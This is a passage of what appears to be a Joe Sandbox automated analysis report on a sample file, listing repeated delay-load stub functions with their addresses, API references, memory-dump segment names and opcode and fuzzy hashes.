                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 6ff04239c71bf2bb253912281fbdc1f3c70542fec3e81727785c801a95997d1f
                                                                                                    • Instruction ID: 863b5bd3a6477540cd803b18b3f8ff32e692ac86980a0ef7fa60fb3115d7358c
                                                                                                    • Opcode Fuzzy Hash: 6ff04239c71bf2bb253912281fbdc1f3c70542fec3e81727785c801a95997d1f
                                                                                                    • Instruction Fuzzy Hash: 75B012F139A100BC310851252C0BCF7014CD4C2F10330B03EFC06F0281D840ED850531
                                                                                                    Function 00E1E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
                                                                                                    • Instruction ID: ea94bd740397dd556f90ad1df890b4d296ee8dc1b1a98e709c6e1835d1320ba6
                                                                                                    • Opcode Fuzzy Hash: 00f28ff26f769abcdd77d524cd6f6bf3c91962a5428d63f4fac2ba2cf93eb314
                                                                                                    • Instruction Fuzzy Hash: 05B012E16992007C310851646D07CB745ADC4C1F10374722EFC04F1280EC404D820531
                                                                                                    Function 00E1E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
                                                                                                    • Instruction ID: 96db915b5164e4858b0655c8ae383a482d782422055562a2adbd2f275b696635
                                                                                                    • Opcode Fuzzy Hash: f6e01ed89361aeb03ce7d182d6606f53c13f88ca3bb48c1723ad20052766bea5
                                                                                                    • Instruction Fuzzy Hash: CDB012E16993007D314851646C07CB705ADC4C1F10334722EFC04F1280E8404CC10531
                                                                                                    Function 00E1E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E580
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Fjun
                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                    • Opcode ID: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
                                                                                                    • Instruction ID: 5998e9cb3ac76115d462a88a66feee5dcff1cd06c7aa22c6050026b23daecd1c
                                                                                                    • Opcode Fuzzy Hash: 665617811dd496815a528854d28907ecee018fff2c86cb73c9d0786db26faf4e
                                                                                                    • Instruction Fuzzy Hash: 46B012E169A2007D310851642C07CB7018DD4C1F20330702EFC04F1680E8404C810531
                                                                                                    Function 00E1E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
                                                                                                    • Instruction ID: f7c810e32063dc1d1c7b36ff02d61420a338482f1b2d59c866d3a9ec698015ca
                                                                                                    • Opcode Fuzzy Hash: cffe0992be73548cf342d634067d3a808818f59371d48c5ac9bd68bac99ada2d
                                                                                                    • Instruction Fuzzy Hash: 3AB012E12982007C324852186C07CBB095EC4C1F10330722EFC04F0280E8404CC90631
                                                                                                    Function 00E1E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: PDu<
                                                                                                    • API String ID: 1269201914-576538559
                                                                                                    • Opcode ID: eee705e69b5b84b5a8349e7619d4eca2b5e208bcc083b061d2e66591bdb8acd1
                                                                                                    • Instruction ID: ab9be19c244f2fedc6e3683a5114431093f896623adf3eafdb67d7f16fd4142f
                                                                                                    • Opcode Fuzzy Hash: eee705e69b5b84b5a8349e7619d4eca2b5e208bcc083b061d2e66591bdb8acd1
                                                                                                    • Instruction Fuzzy Hash: 6DB012E129C1007C310812342C0BCBB050FC4C1F10730703EFC10F05C1A8404D890531
                                                                                                    Function 00E1E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 3d6f66b04be68cfd59a86d3344aeaef1b563ed29c0a705cde02b6c3e12ff84bb
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 3d6f66b04be68cfd59a86d3344aeaef1b563ed29c0a705cde02b6c3e12ff84bb
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 3e60ec25b902e287a77e04ea8c880330031343f0dd7c7c974d916ea2b927ff14
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 3e60ec25b902e287a77e04ea8c880330031343f0dd7c7c974d916ea2b927ff14
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 6476178ed3e247a3359cabad45e0b3aca346176c98d43b9043308482f2a25d3f
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 6476178ed3e247a3359cabad45e0b3aca346176c98d43b9043308482f2a25d3f
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 46ac136d96b6bd6b13f851f3787d9b8b31897c68498e5dfbe0bd3c3b82a6452a
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: 46ac136d96b6bd6b13f851f3787d9b8b31897c68498e5dfbe0bd3c3b82a6452a
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
                                                                                                    Function 00E1E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: a3e90d89bec4e71e4a8ae45780b5999cab231686fb1d12cf114ec8d0eea7e4d8
                                                                                                    • Instruction ID: 0c24d2742ba778068e251ce9b17d86ecf89be445324dbdf48f583332b1096def
                                                                                                    • Opcode Fuzzy Hash: a3e90d89bec4e71e4a8ae45780b5999cab231686fb1d12cf114ec8d0eea7e4d8
                                                                                                    • Instruction Fuzzy Hash: 6BA011F22AA202BC300822222C0ACFB020CE8C0B20330A82EFC03F0280A880A8820830
